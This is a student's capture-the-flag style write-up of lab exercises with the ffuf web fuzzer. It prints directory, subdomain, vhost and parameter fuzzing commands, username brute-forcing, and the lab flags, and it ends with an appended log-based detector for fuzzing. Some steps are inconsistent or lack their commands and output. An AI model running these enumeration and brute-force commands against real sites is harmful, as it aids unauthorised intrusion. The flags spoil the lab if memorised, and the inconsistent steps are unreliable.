JUSTUS KOECH_CS-SA07-24044
ASSIGNMENT: Attacking Web Applications with Ffuf
Overview
Ffuf is a powerful and fast web fuzzer written in Go. It allows security researchers and
penetration testers to discover hidden files, directories, and other web application vulnerabilities
by performing recursive and brute-force searches. Ffuf is known for its speed and flexibility,
making it an excellent tool for CTF challenges.
Step 1: Discovering Hidden Directories
To begin the challenge, we execute Ffuf with a wordlist containing common directory names and
the target URL. The command looks like this:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u http://83.136.249.227:50308/FUZZ
Based on the output, Ffuf discovers the following directories:
● /blog (Status: 301, Size: 322)
● /forum (Status: 301, Size: 323)
The directory we need to find in this step is /forum.
Step 2: Fuzzing the ‘/blog’ Directory
In the second step, we need to fuzz the /blog directory and find all the pages within it. One of
these pages is expected to contain a flag. We use Ffuf again to perform the fuzzing operation
with the wordlist and target URL http://83.136.249.227:50308/.
After the fuzzing process, Ffuf discovers the following page:
● /blog/home.php (Status: 200, Size: 1046, Words: 438, Lines: 58)
To find the flag, we navigate to the discovered page:
http://83.136.250.34:53339/blog/home.php. The flag is revealed on this page:
Flag: HTB{bru73_f0r_c0mm0n_p455w0rd5}
Step 3: Finding More Files/Directories
In the third step, we continue the search for additional files and directories. One of these
resources should provide us with another flag. We need to apply the knowledge gained so far and
repeat the process.
After exploring further, we find the following URL containing the second flag:
http://83.136.249.227:50308/forum/flag.php
Flag: HTB{fuzz1n6_7h3_w3b!}
Step 4: Discovering the Swag Shop Sub-Domain
In the final step, we perform a sub-domain fuzzing test on hackthebox.eu to discover the online
Swag Shop of HackTheBox. We use Ffuf with a wordlist of subdomains and the target URL. The
command is as follows:
ffuf -w Downloads/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/ -c -ic -t 200
After scanning, Ffuf discovers the following sub-domain:
Step 5: VHost Fuzzing
The first challenge requires us to perform a VHost fuzzing scan on the domain ‘academy.htb’
and identify any additional VHosts. To accomplish this, we use the ffuf tool with the following
command:
Step 6: Parameter Fuzzing
In the second challenge, we need to run a parameter fuzzing scan on a specific webpage and
determine the accepted parameter. Using the ffuf tool, we execute the following command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://admin.academy.htb:34138/admin/admin.php?FUZZ=key -fs 798
The scan output indicates that the parameter ‘key’ is accepted by the webpage.
Step 7: Wordlist Creation and POST Request
For the third challenge, we have to create a wordlist called ‘ids.txt,’ identify the accepted value
through a fuzzing scan, and use it in a ‘POST’ request with ‘curl’ to retrieve the flag. Let’s
follow these steps:
1. Create the wordlist ‘ids.txt’ with the desired values.
2. Perform a fuzzing scan using ffuf to identify the accepted value for the 'id' parameter:
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:40208/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
The response contains the flag: HTB{p4r4m373r_fuzz1n6_15_k3y!}.
Skills Assessment — Web Fuzzing
Step 1: Sub-Domain/VHost and Extension Fuzzing
In the fourth challenge, we are tasked with running a sub-domain/VHost fuzzing scan on
‘.academy.htb’ and identifying all the sub-domains. We employ ffuf once again:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:52020/ -H 'Host: FUZZ.academy.htb' -ms 0
The scan output reveals three sub-domains: ‘test.academy.htb,’ ‘archive.academy.htb,’ and
‘faculty.academy.htb.’
2. Before running the page fuzzing scan, it’s recommended to perform an extension fuzzing
scan. The goal is to identify the different extensions accepted by the domains. We can
accomplish this with the following command:
ffuf -w /Downloads/web-extensions.txt:FUZZ -u http://94.237.55.114:47287/indexFUZZ
3. One of the pages you will identify should say ‘You don’t have access!’. What is the full
page URL?
ffuf -w Downloads/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:47287/FUZZ -recursion -recursion-depth 1 -e .php -v -t 80
The scan identifies index.php7, courses, and linux-security.php7. The page that says ‘You don’t
have access!’ is:
http://faculty.academy.htb:52050/courses/linux-security.php7
Challenge 5: Parameter Identification and Fuzzing
In the fifth challenge, we need to identify the parameters accepted by a specific page obtained in
the previous step. We run the following command to achieve this:
ffuf -w Downloads/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:30796/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
The scan output reveals two parameters: ‘user’ and ‘username.’
4. Next, we are required to fuzz the identified parameters with working values to retrieve
the flag. We can accomplish this using the following command:
ffuf -w Downloads/xato-net-10-million-usernames.txt:FUZZ -u http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded'
ffuf -w Downloads/xato-net-10-million-usernames.txt:FUZZ -u http://faculty.academy.htb:56050/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 781
The response contains the flag: HTB{w3b_fuzz1n6_m4573r}.
Shareable link: https://academy.hackthebox.com/achievement/327320/54
Conclusion
In this article, we explored the process of solving various web fuzzing challenges encountered in
a CTF competition. We learned how to perform VHost fuzzing, parameter fuzzing, wordlist
creation, and fuzzing scans for sub-domains, extensions, and parameters. By following these
steps and leveraging the ffuf tool, we successfully obtained the desired flags. Web fuzzing is a
crucial skill in the field of cybersecurity, allowing us to discover vulnerabilities and potential
attack vectors.
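As an added, defender-side example that is not part of the original write-up: the fuzzing styles used above (directory and page brute force, parameter-name fuzzing) leave a recognisable footprint in web server access logs. The script below parses constructed combined-format log lines and flags clients showing those traits; the User-Agent string attributed to ffuf is an assumption about the tool's default, and the thresholds are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined log format as written by Apache/nginx; the regex captures the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one client walking a directory wordlist, one fuzzing parameter
# names on admin.php, one ordinary visitor. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.0.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.0.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /blog HTTP/1.1" 301 322 "-" "Fuzz Faster U Fool v2.0.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /old HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v2.0.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/admin.php?user=key HTTP/1.1" 200 798 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/admin.php?id=key HTTP/1.1" 200 798 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /admin/admin.php?key=key HTTP/1.1" 200 810 "-" "curl/8.0"',
    '192.0.2.4 - - [10/Oct/2023:13:57:10 +0000] "GET /blog/home.php HTTP/1.1" 200 1046 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), status=int(m["status"])) if m else None

def detect_fuzzing(lines, min_requests=4, notfound_ratio=0.6, param_names=3):
    """Map client IP -> reasons: mostly-404 bursts (directory/page fuzzing), many distinct
    query keys on one path (parameter fuzzing), and ffuf's default User-Agent, which is
    assumed here to contain "Fuzz Faster U Fool" (check your ffuf version)."""
    per_ip = defaultdict(lambda: {"total": 0, "nf": 0, "params": defaultdict(set), "ua": False})
    for rec in filter(None, map(parse_line, lines)):
        s, url = per_ip[rec["ip"]], urlsplit(rec["target"])
        s["total"] += 1
        s["nf"] += rec["status"] == 404
        s["params"][url.path].update(k for k, _ in parse_qsl(url.query, keep_blank_values=True))
        s["ua"] |= "fuzz faster u fool" in rec["ua"].lower()
    findings = {}
    for ip, s in per_ip.items():
        reasons = [r for r, hit in (
            ("path-fuzzing", s["total"] >= min_requests and s["nf"] / s["total"] >= notfound_ratio),
            ("param-fuzzing", any(len(v) >= param_names for v in s["params"].values())),
            ("ffuf-user-agent", s["ua"])) if hit]
        if reasons:
            findings[ip] = reasons
    return findings
```

Rate limiting, a WAF rule on the 404 burst, and alerting on the flagged IPs are the usual mitigations; feed `detect_fuzzing` a real log file one line at a time to try it against your own traffic.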